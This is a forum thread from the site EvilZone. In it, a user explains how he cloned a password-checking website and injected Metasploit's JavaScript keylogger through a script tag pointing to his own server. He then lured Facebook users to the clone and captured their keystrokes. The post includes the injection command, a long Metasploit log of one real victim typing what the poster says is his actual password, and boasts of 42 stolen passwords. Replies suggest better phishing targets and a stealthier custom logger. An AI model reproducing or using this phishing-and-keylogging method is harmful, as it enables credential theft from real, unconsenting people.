EvilZone

Hacking and Security => Hacking and Security => : z3ro August 06, 2012, 03:38:24 PM

: Metasploit's javascript_keylogger
: z3ro August 06, 2012, 03:38:24 PM: Although I had discoverd the http_javascript_keylogger quite a long time ago, its only recently that I foung a rather effective way of using it - using it to harvest passwords.

Synopsis

-First, I used httrack to mirror the entire website http://howsecureismypassword.net/ onto my computer.
:
root@z3ro:~# httrack http://howsecureismypassword.net/ Mirror launched on Mon, 12 Aug 2012 17:10:19 by HTTrack Website Copier/3.43-9+libhtsjava.so.2 [XR&CO'2010] mirroring http://howsecureismypassword.net/ with the wizard help.. Done.: howsecureismypassword.net/assets/fonts/League_Gothic-webfont.svg (27651 bytes) - OK Thanks for using HTTrack!

-Next, I injected the javascript keylogger into the web page I had just copied.

:
root@z3ro:~# echo "<script type="text/javascript" src="http://$IP:8081/log/NNRtKZNlErTh.js"></script>" >> /var/www/howsecureismypassword.net/index.html

-I then hosted the website on my computer using lighttpd and started the metasploit listener on port 8081. With my lighttpd running on port 80 and metasploit on port 8081, I forwarded the respective ports to make my website available from the internet.
-Everything was set on my side, I now only needed a 'victim'. And facebook proved to offer many.
-Convincing someone to 'check out' the website proved to be easier than expected.

Here's a preview from my last target:

:
Starting Metasploit [*] Please wait while we load the module tree... MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM =[ metasploit v4.4.0-release [core:4.4 api:1.0] + -- --=[ 916 exploits - 495 auxiliary - 150 post + -- --=[ 250 payloads - 28 encoders - 8 nops demo => true srvhost => 192.168.1.2 srvport => 8081 uripath => log [*] Listening on 192.168.1.2:8081... [*] Using URL: http://192.168.1.2:8081/log [*] Server started. [*] 197.225.238.119 http_javascript_keylogger - Assigning client identifier '0779c624' [+] [0779c624] Logging clean keystrokes to: /root/.msf4/loot/20120805194327_default_197.225.238.119_browser.keystrok_771244.txt [+] [0779c624] Logging raw keystrokes to: /root/.msf4/loot/20120805194330_default_197.225.238.119_browser.keystrok_134192.txt [+] [0779c624] Keys: m [+] [0779c624] Keys: me [+] [0779c624] Keys: mei [+] [0779c624] Keys: mein [+] [0779c624] Keys: meint [+] [0779c624] Keys: meinte [+] [0779c624] Keys: meinter [+] [0779c624] Keys: meintera [+] [0779c624] Keys: meinteraa [+] [0779c624] Keys: meinteraam [+] [0779c624] Keys: meinteraamp [+] [0779c624] Keys: meinteraampl [+] [0779c624] Keys: meinteraampli [+] [0779c624] Keys: meinteraamplif [+] [0779c624] Keys: meinteraamplifi [+] [0779c624] Keys: meinteraamplifie [+] [0779c624] Keys: meinteraamplifier [+] [0779c624] Keys: meinteraamplifie [+] [0779c624] Keys: meinteraamplifi [+] [0779c624] Keys: meinteraamp [+] [0779c624] Keys: meinteraamplif [+] [0779c624] Keys: meinteraampli [+] [0779c624] Keys: meinteraampl [+] [0779c624] Keys: meinteraam [+] [0779c624] Keys: meinteraa [+] [0779c624] Keys: meintera [+] [0779c624] Keys: meinter [+] [0779c624] Keys: meinte [+] [0779c624] Keys: meint [+] [0779c624] Keys: mein [+] [0779c624] Keys: mei [+] [0779c624] Keys: me [+] [0779c624] Keys: m [+] [0779c624] Keys: p [+] [0779c624] Keys: pa [+] [0779c624] Keys: pas [+] [0779c624] Keys: pass [+] [0779c624] Keys: passw [+] [0779c624] Keys: passwo [+] [0779c624] Keys: passwor [+] [0779c624] Keys: password [+] [0779c624] Keys: passwor [+] [0779c624] Keys: passwo [+] [0779c624] Keys: passw [+] [0779c624] Keys: pass [+] [0779c624] Keys: pas [+] [0779c624] Keys: pa [+] [0779c624] Keys: p [+] [0779c624] Keys: m [+] [0779c624] Keys: me [+] [0779c624] Keys: mei [+] [0779c624] Keys: mein [+] [0779c624] Keys: meint [+] [0779c624] Keys: meinte [+] [0779c624] Keys: meinter [+] [0779c624] Keys: meintera [+] [0779c624] Keys: meinteraa [+] [0779c624] Keys: meinteraam [+] [0779c624] Keys: meinteraamp [+] [0779c624] Keys: meinteraampl [+] [0779c624] Keys: meinteraampli [+] [0779c624] Keys: meinteraamplif [+] [0779c624] Keys: meinteraamplifi [+] [0779c624] Keys: meinteraamplifie [+] [0779c624] Keys: meinteraamplifier [+] [0779c624] Keys: meinteraamplifier<CR> [+] [0779c624] Keys: j [+] [0779c624] Keys: jr [+] [0779c624] Keys: jra [+] [0779c624] Keys: jras [+] [0779c624] Keys: jrast [+] [0779c624] Keys: jrasta [+] [0779c624] Keys: jrastam [+] [0779c624] Keys: jrastame [+] [0779c624] Keys: jrastamec [+] [0779c624] Keys: jrastameck [+] [0779c624] Keys: jrastamecka [+] [0779c624] Keys: jrastameckay [+] [0779c624] Keys: jrastameckays [+] [0779c624] Keys: jrastameckaysha [+] [0779c624] Keys: jrastameckaysh [+] [0779c624] Keys: jrastameckayshal [+] [0779c624] Keys: jrastameckaysha [+] [0779c624] Keys: jrastameckaysh [+] [0779c624] Keys: jrastameckays [+] [0779c624] Keys: jrastameckay [+] [0779c624] Keys: jrastamecka [+] [0779c624] Keys: jrastameck [+] [0779c624] Keys: jrastamec [+] [0779c624] Keys: jrastame [+] [0779c624] Keys: jrastam [+] [0779c624] Keys: jrasta [+] [0779c624] Keys: jrast [+] [0779c624] Keys: jras [+] [0779c624] Keys: jra [+] [0779c624] Keys: jr [+] [0779c624] Keys: j [+] [0779c624] Keys: j [+] [0779c624] Keys: j0 [+] [0779c624] Keys: j0k [+] [0779c624] Keys: j0ks [+] [0779c624] Keys: j0ksh [+] [0779c624] Keys: j0ksh4 [+] [0779c624] Keys: j0ksh4s [+] [0779c624] Keys: j0ksh4sh [+] [0779c624] Keys: j0ksh4sh4 [+] [0779c624] Keys: j0ksh4sh4l4 [+] [0779c624] Keys: j0ksh4sh4l [+] [0779c624] Keys: j0ksh4sh4l4e [+] [0779c624] Keys: j0ksh4sh4l4ev [+] [0779c624] Keys: j0ksh4sh4l4ev4 [+] [0779c624] Keys: j0ksh4sh4l4ev [+] [0779c624] Keys: j0ksh4sh4l4e [+] [0779c624] Keys: j0ksh4sh4l4 [+] [0779c624] Keys: j0ksh4sh4l [+] [0779c624] Keys: j0ksh4sh4 [+] [0779c624] Keys: j0ksh4sh [+] [0779c624] Keys: j0ksh4s [+] [0779c624] Keys: j0ksh4 [+] [0779c624] Keys: j0ksh [+] [0779c624] Keys: j0ks [+] [0779c624] Keys: j0k [+] [0779c624] Keys: j [+] [0779c624] Keys: j0 [+] [0779c624] Keys: w [+] [0779c624] Keys: wi [+] [0779c624] Keys: wis [+] [0779c624] Keys: wish [+] [0779c624] Keys: wish [+] [0779c624] Keys: wish u [+] [0779c624] Keys: wish up [+] [0779c624] Keys: wish up0 [+] [0779c624] Keys: wish up0n [+] [0779c624] Keys: wish up0n [+] [0779c624] Keys: wish up0n a [+] [0779c624] Keys: wish up0n a [+] [0779c624] Keys: wish up0n a s [+] [0779c624] Keys: wish up0n a st [+] [0779c624] Keys: wish up0n a sta [+] [0779c624] Keys: wish up0n a star [+] [0779c624] Keys: wish up0n a sta [+] [0779c624] Keys: wish up0n a st [+] [0779c624] Keys: wish up0n a s [+] [0779c624] Keys: wish up0n a [+] [0779c624] Keys: wish up0n a [+] [0779c624] Keys: wish up0n [+] [0779c624] Keys: wish up0n [+] [0779c624] Keys: wish up0 [+] [0779c624] Keys: wish up [+] [0779c624] Keys: wish u [+] [0779c624] Keys: wish [+] [0779c624] Keys: wish [+] [0779c624] Keys: wis [+] [0779c624] Keys: wi [+] [0779c624] Keys: w [+] [0779c624] Keys: a [+] [0779c624] Keys: am [+] [0779c624] Keys: amh [+] [0779c624] Keys: amhg [+] [0779c624] Keys: amhgw [+] [0779c624] Keys: amhgws [+] [0779c624] Keys: amhgwsd [+] [0779c624] Keys: amhgwsdk [+] [0779c624] Keys: amhgwsdkj [+] [0779c624] Keys: amhgwsdkj. [+] [0779c624] Keys: amhgwsdkj.c [+] [0779c624] Keys: amhgwsdkj.ce [+] [0779c624] Keys: amhgwsdkj.ced [+] [0779c624] Keys: amhgwsdkj.cedv [+] [0779c624] Keys: amhgwsdkj.cedvh [+] [0779c624] Keys: amhgwsdkj.cedvhe [+] [0779c624] Keys: amhgwsdkj.cedvhe/ [+] [0779c624] Keys: amhgwsdkj.cedvhe/r [+] [0779c624] Keys: amhgwsdkj.cedvhe/rl [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/ [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b' [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ieo [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b' [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/ [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv [+] [0779c624] Keys: amhgwsdkj.cedvhe/rl [+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb [+] [0779c624] Keys: amhgwsdkj.cedvhe/r [+] [0779c624] Keys: amhgwsdkj.cedvhe/ [+] [0779c624] Keys: amhgwsdkj.cedv [+] [0779c624] Keys: amhgwsdkj.cedvhe [+] [0779c624] Keys: amhgwsdkj.ced [+] [0779c624] Keys: amhgwsdkj.cedvh [+] [0779c624] Keys: amhgwsdkj.c [+] [0779c624] Keys: amhgwsdkj.ce [+] [0779c624] Keys: amhgwsdkj. [+] [0779c624] Keys: amhgwsdkj [+] [0779c624] Keys: amhgwsdk [+] [0779c624] Keys: amhgwsd [+] [0779c624] Keys: amhgws [+] [0779c624] Keys: amhgw [+] [0779c624] Keys: amhg [+] [0779c624] Keys: amh [+] [0779c624] Keys: am [+] [0779c624] Keys: a [+] [0779c624] Keys: ab [+] [0779c624] Keys: a [+] [0779c624] Keys: abc [+] [0779c624] Keys: abcd [+] [0779c624] Keys: abcde [+] [0779c624] Keys: abcdef [+] [0779c624] Keys: abcdefg [+] [0779c624] Keys: abcdefgh [+] [0779c624] Keys: abcdefghi [+] [0779c624] Keys: abcdefghij [+] [0779c624] Keys: abcdefghijk [+] [0779c624] Keys: abcdefghijkl [+] [0779c624] Keys: abcdefghijklm [+] [0779c624] Keys: abcdefghijklmn [+] [0779c624] Keys: abcdefghijklmno [+] [0779c624] Keys: abcdefghijklmnop [+] [0779c624] Keys: abcdefghijklmnopq [+] [0779c624] Keys: abcdefghijklmnopqr [+] [0779c624] Keys: abcdefghijklmnopqrs [+] [0779c624] Keys: abcdefghijklmnopqrst [+] [0779c624] Keys: abcdefghijklmnopqrstu [+] [0779c624] Keys: abcdefghijklmnopqrstuv [+] [0779c624] Keys: abcdefghijklmnopqrstuvw [+] [0779c624] Keys: abcdefghijklmnopqrstuvwx [+] [0779c624] Keys: abcdefghijklmnopqrstuvwxy [+] [0779c624] Keys: abcdefghijklmnopqrstuvwxyz

That's it. His password was actually meinteraamplifier and although the guy seemed to have enjoyed typing 'what-ever-he-felt-like-typing', I did get his passwd!

I have over 42 passwords now and I've concluded a success rate of about 87%

The human weakness factor is so much easier to penetrate than the network or server weaknesses. The attack is plain and simple, with no known problems with AV's.
: Re: Metasploit's javascript_keylogger
: techb August 06, 2012, 04:43:09 PM: The method can be very effective and you played this off well. The only thing I would change is the site you mirrored. A place to get email addressees and or user names would be good too. I don't see a lot of people, especially smart people putting in their actual password. A lot of people know how to make secure password already.

Maybe a site that uses a Facebook login would be good. Also, checking the URL could stop would-be key logs.

Overall good job, it's a great start.
: Re: Metasploit's javascript_keylogger
: Stackprotector August 06, 2012, 05:11:33 PM: I don't get the point why you would use metasploit for that. That will raise firewalls :).

You can write a AJAX script who logs everything into a database of text file :D